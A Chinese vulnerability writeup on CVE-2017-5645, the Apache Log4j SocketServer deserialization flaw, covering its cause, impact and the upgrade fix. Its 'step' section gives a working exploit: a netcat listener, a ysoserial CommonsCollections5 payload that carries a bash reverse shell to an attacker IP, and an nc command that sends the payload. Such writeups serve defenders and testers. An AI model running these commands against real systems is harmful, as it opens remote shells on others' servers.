CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

plain 复制代码
攻击者
  ↓
TCP / UDP 发送恶意序列化对象
  ↓
Log4j SocketServer
  ↓
ObjectInputStream.readObject()
  ↓
Gadget chain
  ↓
任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

bash 复制代码
nc -lvnp 9001

2、生成恶意payload

bash 复制代码
java -jar ysoserial.jar CommonsCollections5 "sh -i >& /dev/tcp/172.30.22.210/9001 0>&1" > payload.bin

3、发送,反弹shell

bash 复制代码
nc 172.xxx.xxx.xxx 5007 < payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到 Apache Log4j 2.8.2 或以上 版本
相关推荐
特别关注外国供应商1 天前
SSH 的 PrivX OT 工业安全远程访问 (ISRA) 被 分析机构 Industrial Cyber 认可
人工智能·网络安全·ssh·特权访问管理·工业安全远程访问·privx·ot 访问安全
M建1 天前
核心交换机安全实战:内网隔离 + 端口封堵 + 白名单放行全配置
运维·网络安全·交换机
hzxpaipai1 天前
英语+越南语网站架构设计:派迪科技多语言建站实践解析
网络·科技·物联网·网络安全·https
航Hang*1 天前
第2章:进阶Linux系统——第10节:Linux 系统编程与 Shell 脚本全解笔记(GCC+Make+Vim+Shell Script)
linux·运维·服务器·学习·vim·apache·vmware
CHICX12291 天前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
鹅天帝1 天前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
倔强的石头1061 天前
时序数据库选型指南:可视化与分析协同怎么选?——以 Apache IoTDB + Grafana + 大数据引擎为例
apache·时序数据库·iotdb
芯盾时代1 天前
政务行业面临的网络风险
网络·数据库·网络安全
zz0723201 天前
Apache Kafka 开源的分布式事件流平台
分布式·kafka·apache
买大橘子也用券1 天前
第一届 Polaris CTF 招新赛(部分web) wp
web安全·网络安全